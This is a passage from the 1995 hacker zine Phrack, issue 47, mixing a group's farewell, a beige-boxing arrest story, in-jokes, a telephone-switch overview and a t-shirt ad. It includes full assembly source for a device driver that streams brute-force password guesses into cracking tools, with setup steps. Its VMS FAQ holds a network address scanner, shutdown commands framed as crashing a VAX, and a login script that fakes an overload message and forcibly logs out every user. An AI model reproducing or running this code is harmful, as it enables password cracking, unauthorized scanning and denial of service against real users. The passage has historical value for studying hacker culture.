difficult to get a clear picture of exactly what is going on. We have heard so many things from so many different sources, both credible and questionable, that we would be hard-pressed to give an accurate evaluation of the current state of things. What we can say for sure, however, is that KoV officially died on Monday, January 23, 1995, along with its communications network, KoVNet. This promises to be a great loss to the open-minded and sociopolitical community as well as the free-thinkers and activists who supported us so generously. Our reasons for disbanding the group were many, but the foremost was in light of the current situation we are facing. Consider this last obstacle our final, stalwart stand against the evils of AmeriKKKan government and its various greedy, capitalistic agencies. From the moment of KoV's conception, they have publicly sought to destroy us; to silence our questioning of authority, to oppress our free-thinking minds, and to close off our intellectual channels of communication. They have even gone so far as to stalk us in public places. 'Tis a shame indeed. If you have any questions or if you wish to contact us for any reason, you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". I will try to post further updates of this saga to CiPNet, ThrashNet, QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. We would appreciate any support that other h/p, art or political groups can lend us. Until then, my friends... -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV ------------------------------------------------------------------------------ What happens when you are caught beige boxing. by Rush 2 Yeah yeah, I'm the only one. But here is a generally interesting description of everything to getting caught to arraignment. Well about 5 months ago i needed to set up a conference really quick.. it was about 12:00 (never knew there was a 10:00 pm curfew in that area) and went to a 25 pair box at this local strip mall. Well I was out there the box was already open and I was just about to start testing pairs to see which was connected and what wasn't. All of a sudden, i hear this loud screeching sound of a car coming to a skid from doing about 90mph. I turned and saw that typically dirty squad car about to hit me.. you know the car, mud and dust on the tires and body, coffee and smudge marks all over the windshield. i got on my bike and started to run. Now the thing is I COULD have gotten away.. the pathetic excuse for a cop had run not more than 10 yards after me and decided that I was a threat so he pulled his handgun and yelled. I saw this and thought it would be wiser to stop than get shot. Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did not know i was less than a half mile from a police station and they were looking for a prowler in the general area. The police did the normal, called me scum, asked me what i was doing, searched me until they were satisfied... than picked me up and threw me in the car... the funny thing was they didn't see my phone until they threw me into the back seat and the cord fell out.. (they never saw the page of notes and 'naughty' material in my pocket though it was about 4 inches thick and sticking out that a blind man could see it. Well they got me to the station and pried my info out, and called my father... I came up with a good enough story about some made up user who told me to go across the street and plug in.. then I was told I would be dealt with in the next week... I did not receive anything for three and a half months. Once the time came for the arraignment (for a juvenile they called it an intake). I got to go to the police station, sit for about 3 hours (as if i thought they would be on time) until I waited for my probation officer. Finally she got there and we proceeded to talk. She explained all of the charges and my lawyer (interesting guy) laughed, I was being charged with prowling (could be disputed I was on a public sidewalk and there in that strip mall is a 24 hr laundry mat), loitering (again that could be disputed), and attempted theft of services (though I NEVER even plugged in). After this was all said i spent the next hour talking with the lady in private. I immediately found she had an interest in computers and was having a problem with her home pc. So I easily changed the topic to my fascination in computers and solved her problem with her computer, and answered at least 50 questions about them. In the last 10-15 minutes of the conversation all i could get from her were statements about how impressed and how intrigued she was with me. She ended up giving me a look (that was hard to judge but i am staying away from this chick) that was either confusion or attraction, slipped me a card with her home phone number and name and called back in my lawyer and parents. Once they got back in, all that she really said was I was a great boy, that she would like to see me do more with my time besides computers, and that she was taking my sentence of 12 months formal probation with 300 hours of community service to 3 months of informal probation with 30 hours of community service. That and she said bell was asking her what to do and she would tell them that it was a non issue since I did not plug in and even if I had it would not be their concern unless I had plugged in to the telco access part of the network interface. Well I have yet to receive official record of having to perform the community service or the probation but I called my probation officer yesterday and said she wasn't putting the community service into the punishment and it has been an equivalent amount of time to just say that since I haven't gotten in trouble since she will count the probation as already served. Luckily she based all other needs of me on the report from a teacher, and with my luck she picked the one teacher, my computers teacher, that no matter what I did or said would lie and say I didn't. Thanks to erikb for publishing this, and greets to CXrank, paradox, dark phiber, the fat cop (who spilled his coffee and box of donuts coming after me) that made this all possible, and to everyone else. -rush 2 http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html Look for My site, unforeseen danger soon to be on a 28.8 slip and by the end of the summer on a 500k slip connect. ------------------------------------------------------------------------------ [Something found on IRC] Danny Partridge Emmanuel Goldstein (AKA Danny Bonaduce: (AKA Eric Corley: a child star from the child-like publisher "The Partridge Family" of 26oo magazine. ---------------------- ------------------ Hosts a boring local Hosts a boring local radio program. radio program. Quasi Celebrity Quasi Celebrity Status among Status among 70's freaks telephone phreaks Periods of Heavy Periods of Heavy Drug Usage Drug Usage Involved in Sex Involved in Sex Scandal with Scandal with another man another man Last name is Friends with Phiber "Bonaduce" Optik whose first handle was "Il Duce" Supplements incoming Supplements incoming by doing desperate by doing desperate local talk shows local talk shows whenever he can. whenever he can. ------------------------------------------------------------------------------ Top 10 #hack fights that would be the coolest to see. (And no, Ophie's not in it twice just because she's a girl...) =========================================================================== 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling featuring KL & TK. 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the one after that... or, uh... 8.) C-Curve and Elite Entity, "Who's who?" 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." (Or: "I'm totally numb, let me hug you!!!") 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains" 5.) Grayarea vs. Netcom "No, *I* want root..." 4.) WWF Wrestling with Len and |al|. 3.) Ophie vs. Voyager, "Night of the Living Dead." 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle." and the number one #hack fight is 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl" ------------------------------------------------------------------------------ P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit +++++++++++++++++++++++++++++++++++++++++++++ The device driver code listed below provides a data stream of passwords. The device driver approach was used to speed up the process of cracking passwords on an incremental basis. The usual approach was to generate the passwords to a file, then reading the file, etc..the device driver approach circumvents these file storage problems, and others, such as having enough free disk space and delays from disk i/o. This driver operates completely in memory (approx. 0.5Kb) How practical is this? ---------------------- This program would be very useful if you think you may know what strategy the user/admin uses for picking out their passwords. Without eliciting some sort of a strategy, forget it-- unless your desperate enough!! A "strategy" could consist of any of these possible advantages-- 1) default passwords (ie: SIN, student #, birth date, phone number...) 2) the mutation of a lUSERs' known password from another system 3) viewing the mark typing in most of their password with a couple of unseen characters 4) etc... --------------------------- With the sample device driver provided, passwords starting at 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length of the password string can be modified by changing the length of the password string itself (that is, the variable "number"). The range of characters in the passwords can also be changed by modifying the following two lines: ;hackdrv.sys ;. ;. ; for ending character-- cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range ...and for starting character cmp byte ptr [number+si],'a' ;starting char. in range ; ;---------------------- for instance, if you wished to generate numbers from "0000000" to "9999999" -change the ending character to: cmp byte ptr [number+si],'9'+1 -starting character to: cmp byte ptr [number+si],'0' and "number" variable from 'aaaaaa' to '0000000' and then recompile.. ----- ..or in the third case, if u had observed a lUSER type in most of their password, you may want to rewrite the code to limit the search. IE: limit the keys to a certain quadrant of the keyboard. Modify the code starting at "reiterate:" and ending at "inc_num endp" for this. ================================================================= /'nuff of this!/ How do I get things working? ----------------------------------------------- Compile the device driver "hackdrv.sys", and the second program, "modpwd.asm". Then specify the device driver inside config.sys (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 compiler, v3.03. Some modifications might be needed to work with other compilers. To use it in prgs like crackerjack, type in the following on the command line: c:\>jack -pwfile: -word:hackpwd ------ If you had stopped a cracker program (eg: crackerjack) and want to pick up from where you left off, run the program "modpwd.com". This program can change HACKDRVs password through- a) a command line argument (ie: "modpwd aabbbbe") b) executing the program with no parameters (this method also displays the current password in memory) Happy Hacking, Uncle Armpit ;-----------------------cut here-------------------------------- ;Program HACKDRV.SYS ; org 0h next_dev dd -1 attribute dw 0c000h ;character device w/ ioctl calls strategy dw dev_strategy interrupt dw dev_int dev_name db 'HACKPWD ' countr dw offset number number db 'aaaaaa',0ah ;<----six characters, lower case numsize equ $-number - 2 afternum: ;working space for device driver rh_ofs dw ? rh_seg dw ? dev_strategy: ;strategy routine mov cs:rh_seg,es mov cs:rh_ofs,bx retf dev_int: ;interrupt routine pushf push ds push es push ax push bx push cx push dx push di push si cld push cs pop ds mov bx,cs:rh_seg mov es,bx mov bx,cs:rh_ofs mov al,es:[bx]+2 rol al,1 mov di,offset cmdtab xor ah,ah add di,ax jmp word ptr[di] cmdtab: ;command table dw init ;0 dw exit3 ;1 dw exit3 ;2 dw ioctl_read ;3 dw do_read ;4 dw exit3 ;5 dw exit3 ;6 dw exit3 ;7 dw exit3 ;8 dw exit3 ;9 dw exit3 ;10 dw exit3 ;11 dw ioctl_write ;12 dw exit3 ;13 dw 5 dup (offset exit3) ioctl_read: push es push bx mov si,es:[bx+10h] mov di,es:[bx+0eh] mov es,si push cs pop ds mov si,offset number xor cx,cx get_char: lodsb stosb inc cl cmp al,0ah jz ioctl_rend jmp get_char ioctl_rend: pop bx pop es mov es:[bx+012h],cx mov cs:countr,offset number jmp exit2 ioctl_write: push es push bx mov si,es:[bx+010h] mov ds,si mov si,es:[bx+0eh] mov cx,numsize+1 ;es:[bx+012h] push cs pop es mov di,offset number repe movsb pop es pop bx mov cs:countr,offset number jmp exit2 do_read: push es push bx push cs pop ds mov si,[countr] inc si ;word ptr [countr] cmp si,offset afternum jnz is_okay mov si,offset number call inc_num is_okay: mov [countr],si mov di,es:[bx]+0eh mov ax,es:[bx]+010h mov cx, es:[bx]+012h jcxz clean_up mov es,ax repe movsb clean_up: pop bx pop es jmp exit2 exit3: mov es:word ptr 3[bx],08103h jmp exit1 exit2: mov es:word ptr 3[bx],0100h exit1: pop si pop di pop dx pop cx pop bx pop ax pop es pop ds popf retf exit: inc_num proc near push si mov si,numsize reiterate: inc byte ptr [number+si] cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range jnz _exit mov byte ptr [number+si],'a' ;starting char. in range dec si cmp si,-1 jnz reiterate mov byte ptr [number],01ah ;send EOF _exit: pop si ret inc_num endp at_eof: ; the non-resident code starts here initial proc near push es push cs pop ds push cs pop es mov si,offset number mov di,offset tmpnum cld _again: lodsb cmp al,0ah jz _nomorechars stosb jmp _again _nomorechars: mov si,offset msgend mov cx,4 repe movsb mov ah,09 ;print welcome message mov dx,offset msg1 int 21h pop es ret initial endp init: call initial mov ax,offset at_eof mov es:[bx]+0eh,ax push cs pop ax mov es:[bx]+010h,ax mov cs:word ptr cmdtab,offset exit3 jmp exit2 msg1 db "Incremental Password Generator (c)1995",0ah,0dh db "Written by Uncle Armpit",0ah,0dh,0ah,0dh db "Starting at word [" tmpnum db 10 dup (?) msgend db "]",0a,0d,'$' ;END hackdrv.sys ;------------------------------cut here---------------------------------- ;PROGRAM modpwd.asm ; org 0100h mov ax,03d02h xor cx,cx mov dx,offset devname int 21h jnc drvr_found mov ah,09 mov dx,offset no_drvr int 21h jmp error_pass drvr_found: mov bx,ax mov ax,04402h mov cx,20 ;read 20 characters mov dx,offset databuffr int 21h mov pass_len,al dec al mov ah,al and al,0fh mov cl,4 shr ah,cl add ax,03030h cmp al,'9' jbe inrange add al,7 inrange: cmp ah,'9' jbe inrange1 add ah,7 inrange1: mov byte ptr [num_chr],ah mov byte ptr [num_chr+1],al cld mov di,offset databuffr-1 xor cx,cx mov cl,pass_len add di,cx mov si,offset pass_end mov cx,stringsz repe movsb ;check for information in command line ;else--> prompt for user input mov al,pass_len or byte ptr [0080h],0 jz req_input mov cl,[0080h] dec cl mov [0081h],cl mov si,0081h mov di,offset newpass mov cx,20 repe movsb jmp vrfy_info req_input: mov ah,09 mov dx,offset cur_pass int 21h mov ah,0a mov dx,offset pass_len int 21h vrfy_info: mov ax,word ptr [pass_len] cmp ah,0 jz error_pass dec al cmp ah,al jnz error_len ;change the current password xor cx,cx mov cl,al mov ah,044h mov al,03 mov dx,offset newpass+1 int 21h jnc success_pass error_len: mov ah,09 mov dx,offset errormsg int 21h error_pass: mov ax,04c01h ;abnormal termination int 21h success_pass: mov ax,04c00h int 21h devhandle dw ? cur_pass db 'Current password is [' databuffr db 20 dup (?) pass_end db '] ;' num_chr db ' ' db ' characters',0ah,0dh,0ah,0dh prompt db 'New word: ','$' stringsz equ $ - pass_end pass_len db 00 newpass db 20 dup (?) errormsg db 'error changing password!',0ah,0dh,'$' no_drvr db 'Error: ' devname db "HACKPWD ",00 db 'device driver not loaded!',0ah,0dh,07,'$' ------------------------------------------------------------------------------ -- Frequently & Rarely asked questions about VMS -- part one by Opticon the Disassembled - UPi [1] " I have a kropotkin.hlp file. What could I possibly do with it ? " $ library /insert /help sys$help:helplib.hlb kropotkin.hlp . . . $ help kropotkin [2] " I have a bakunin.tlb file. What to do with it ? " $ library /extract=(*) bakunin.tlb . . . $ dir [3] " I would like to have a look at prunton.dat. " $ dump [/block=(count:x)] prunton.dat Where "x" is the number of blocks DUMP will display. [4] " How can I use an external editor with mail ? " $ mail :== mail /edit=(send,reply=extract,forward) [5] " How a HELP file is organized ? " $ create example.hlp 1 EXAMPLE THIS IS AN EXAMPLE. 2 MORE_EXAMPLES MORE EXAMPLES. 3 EVEN_MORE_EXAMPLES EVEN MORE EXAMPLES. [6] " How can I have a look at queues ? " $ show queue smtp /all/full or $ show queue /batch/all/full or $ show queue /all/full [7] " My mail is holded, for some reason, in the SMTP queue... " Either $ delete /entry=XXX or $ set entry XXX /release in order to force VMS to release it right away. [8] " How do I have a look at DTE and circuits available. " $ mc ncp show known dte and $ mc ncp show known circuits You may also may find of interest: $ mc ncp show known networks $ mc ncp show known lines $ mc ncp show known destinations [9] " I need a NUA scanner for VMS. " $ OPEN/READ VALUES SCAN.VAL $ READ VALUES PRE $ READ VALUES DTE $ READ VALUES END $ CLOSE VALUES $ LOG = "SCAN.LIS" $ TMP = "SCAN.TMP" $ OPEN/WRITE FILE 'LOG $ WRITE FILE "PREFIX:",PRE $ WRITE FILE "START :",DTE $ WRITE FILE "LAST :",END $LOOP: $ ON ERROR THEN GOTO OPEN $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE' $ WAIT 00:00:06 $ SPAWN_NAME = F$GETJPI("","USERNAME") $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_" $ CONTEXT = "" $FIND_PROC: $ PID = F$PID(CONTEXT) $ IF PID .EQS. "" THEN GOTO OPEN $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID $ GOTO FIND_PROC $OPEN: $ ON ERROR THEN GOTO OPEN $ OPEN/READ PAD 'TMP $ MSSG = " Process stopped" $ ON ERROR THEN GOTO CLOSE $ READ PAD LINE $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE) $CLOSE: $ CLOSE PAD $ DELETE 'TMP';* $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN $ WRITE FILE PRE,DTE,MSSG $NOCONN: $ DTE = DTE + 1 $ IF DTE .LE. END THEN GOTO LOOP $ CLOSE FILE ( I don't have a clue by whom the code was written. ) then $ create scan.val prefix starting_NUA ending_NUA $ submit /noprint scan.com . . . $ search scan.lis "call connected" [10] " How do I crash a VAX !? " $ set default sys$system $ @shutdown or $ set default sys$system $ run opccrash [11] " I have a dostogiefski.cld file; what do I do with it ? " $ set command dostogiefski.cld [12] " Can I send messages to interactive processes ? " $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella " [13] " How can I prevent someone from phoning me all the time ? " $ set broadcast=(nophone) [14] " Can I postpone/disable interactive logins ? " $ set logins /interactive=0 $ set logins /interactive will display current value. Under the same `logic' : $ create innocent_filename.com $ set nocontrol $ context = "" $ pid = F$PID(context) $ user_name = F$GETJPI(pid,"username") $ wait 00:01:00.00 $ write sys$output "" $ write sys$output " System overloaded; please try again later " $ write sys$output " Logging out process ''pid', of user ''user_name' " $ write sys$output "" $ logout /full Add either to sys$system:sylogin.com or sys$login:login.com the following: " $ @innocent_filename.com ". [15] " How can I modify the welcome file ? Where is it held ? " $ set default sys$system $ edit welcome.txt [16] " I am editing a huge text file. How can I reach the end of it ? " at the editor's prompt type: *find end or *find "search string" [17] " How can I be sure than noone is watching me from a hidden process ? " $ show system /process VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426 00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121 00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248 $ show system /full VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 [1,4] 00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 [1,4] 00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121 [1,4] 00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268 [1,4] $ See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4, SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but state, priority, physical memory used, page faults, input/output and Process IDentification numbers, can reveal, in combination, such a nastyness. Afterwards you may " show process /id=xxxx /continuous ", or " stop /id=xxxx ". [18] " Can I view the CPU usage of each process ? " $ monitor processes /topcpu will display a bar-chart of this kind. [19] Run the following .COM file and it will display information you'd possibly need on an account and/or node. It uses simple lexical functions. $ output :== write sys$output $ output "" $ node_id = F$CSID(context) $ nodename = F$GETSYI("nodename",,node_id) $ if F$GETSYI("cluster_member") .EQS. "TRUE" $ then output " ''nodename' is a member of a cluster. " $ else output " ''nodename' is not a member of a cluster. " $ context = "" $ username = F$GETJPI("","username") $ output " Username : ''username' " $ group = F$GETJPI("","grp") $ output " Group : ''group' " $ uic = F$USER() $ output " User Identification Code : ''uic' " $ pid = F$PID(context) $ output " Process IDentification : ''pid' " $ process = F$PROCESS() $ output " Process Name : ''process' " $ terminal = F$GETJPI("","terminal") $ output " Terminal Name : ''terminal' " $ priority = F$GETJPI("","authpri") $ output " Authorized Priority : ''priority' " $ maxjobs = F$GETJPI("","maxjobs") $ output " Maximum Number of Processes Allowed : ''maxjobs' " $ authpriv = F$GETJPI("","authpriv") $ output " Authorized Privileges : ''authpriv' " $ curpriv = F$GETJPI("","curpriv") $ output " Current Privileges : ''curpriv' " $ directory = F$DIRECTORY() $ output " Directory : ''directory' " $ protection = F$ENVIRONMENT("protection") $ output " Protection : ''protection' " $ boottime = F$GETSYI("boottime") $ output " Boot Time : ''boottime' " $ time = F$TIME() $ output " Current Time : ''time' " $ version = F$GETSYI("version") $ output " VMS version : ''version' " $ output "" You may : $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb and then transfer lexicals.hlp. [20] " How can I view/modify my disk quota limit ? " DiskQuota was a standalone utility in versions prior to five; It is now a subset of the System Management utility, and thus you should : $ set def sys$system $ run sysman SYSMAN> diskquota show /device=dua1: [1,1] %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: -- Node UIC Usage Permanent Quota Overdraft Limit [1,1] 123456 1500000 100 SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000 [END] Post Scriptum Some operations require privileges. ------------------------------------------------------------------------------ Compaq CEO blunders on TV Compaq CEO Eckard Pfeiffer last week visited The Netherlands to do some pr work. During a television interview for NOVA, a well known news show that aired last Friday, Pfeiffer claimed that pc's were easy to use, and could be used by virtually anyone. So, the reporter asked him to switch the tv channel on a Presario that was next to Pfeiffer that ran a Windows-based TV tuner. The result was Pfeifer frantically clicking on several menu bars, but instead of switching channels, he exited the program altogether. To make things worse, the reporter next asked him to start up a word processor. Again, Pfeiffer, clicked his way around the desktop, but couldn't find nor start the program. Finally, he was asked to start up a game. You saw Pfeifer (now in deep trouble) clicking on all the tabs of the "easy to use" tab-works interface that is included on all Presario's, looking for games, while muttering "Were are ze games? I can't find ze games on zis machine!!!", his accent becoming increasingly more German then before. It was almost like Dr. Strangelove. The last shot is of a Compaq tech support guy, rushing in to help him out.... So much for ease of use.... Voorburgwal 129, 1012 EP Amsterdam, The Netherlands). ------------------------------------------------------------------------------ Ok, I'm going to assume that you already know a little bit about what it is you're reading. The DMS100/IBN (integrated business network) is composed of mainly electronic business sets, phones, data units, and attendant consoles and units, all physically at the customers place of business. While the digital switching software and support hardware is located at the Telco. Together, in tandem they work to give the customer one of the best combinations of features and benefits. The DMS-100 combines voice AND data in one business comunications package. One of the many advantages is it offers the use with *any* sized business with up to 30,000 lines. The IBN system controls most operations, diagnoses problems, and also has the ability to do limited repairs on itself. Being modular, it can meet the needs at hand, and have the ability for new features, as time goes by, while still maintaining a cost-effective environment. Another advantage is that is uses a central attendant where and when needed. Along with Call Routing, or CDR, to control and restrict Long Distnace Calling, and network management. The IBN gives the user hassle free operation. Northern Telcom's DMS-100 switches, which by the way are digital, are frequently backed-up by their *higher trained* personnel, which isnt saying much. Some other features are: Automatic Routing Selection, or ARS, which routes the long distance calls, if they are even allowed, over the most economical (right) route available. Station Message Detail Recording, or SMDR, which basically does just what its name states, records long distance charges, including but not limited to, originating number, time and length of call, authorization code, and others... Yet another capability is the Direct Inward System Access (DISA), which gives the personnel the ability to use the system to place long distance calls cheaply, even from outside the company (sounds like a PBX a bit doesn't it?). System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys, each with its associated source AND destination lamp to signify the status of both the calling and the called party status. The Second feature is Alpha Numeric Display Multiple Directory Number Feature Keys, up to 42 of them, which can be used for a Paging System, or speed dialing, and things along those lines. A third feature is the release Source/Release Destination Console, which features access to paging. Other features which mainly are unimportant I will list here, they are: Call Identifier Exclude Source/Exclude Destination. Remote Console Call Destination. Signal Source.Signal Destination. Call Holding. Call Detail Entry. Remote Console Call Selection. Console Display. Camp-on Automatic Recall Conference. A 6 port 2 way splitting non-delayed operation. Busy Verification of Lines. Manual and Automatic Hold. Multiple Console OPeration. Busy verification of trunks. Switched Loop Operation. Trunk Group Busy Indication. Uniform Call distribution form queue. Multiple listed directory numbers. Control of trunk group access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. Delayed Operation. Position Busy. Interposition Calling. THrough Call Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed Call. Call Transfer/Conference. On-Hook Dialing. Additional Programmable Features include automatic hold. Listem-on hold. Multiple Appearance Directory Numbers, or MADN. Single Call Arrangement. Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume Control. Call Waiting. Stored Number Redial. Private Business Line. And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be used as a "standalone" or can be attached to the business set or other phone type unit. It has the ability to transmit over a two wire loop, at speeds of up to 56 kb per second, using a proprietary time compression multiplexing technology. The DMS100 is also available in different models to suit existing terminal capacities. It also provides integrated voice/data, that right data, communications. They, the phone company, and data unit, can operate together, simultaniously, or even independant of one another. Being fully digitized, it was one if the first switches to eliminate the use of those dinosaur analog modems (for which i still have a few if anyone wants to buy em off me or give me shipping money and ill send em to ya free). Well thats it for now. This should give you a good understanding of the capabilities of one of the many switches in use today. In fact, although outdated somewhat, my telco, citizens utilities, and one in stockton from what i just found out, is still using this switch (poor me in elk grove, ca eh?) which makes phreaking quite an easy task, not that it was really ever hard but anything to make it easier help. ANyway, if you have any comments/flames/general bullshit, mail it to either jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a last resort email address. ciao ---Captain Hook ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Six, Issue Forty-Seven, File 4 of 22 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ The official Legion of Doom t-shirts are stll available!!! Join the net luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ [The editor's Open Letter to Wired Magazine...they actually had the nerve to print it in their May issue. Amazing...or was it? The letter was posted to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well, sent in email to every user of wired.com, faxed to all 7 fax machines at Wired and sent to them registered mail. Probably more than 5 times Wired's paid circulation saw it, so they HAD to print it or look foolish. At least, that's my take on it. Just for overkill, here it is again.] To Whom It May Concern: I am writing this under the assumption that the editorial staff at Wired will "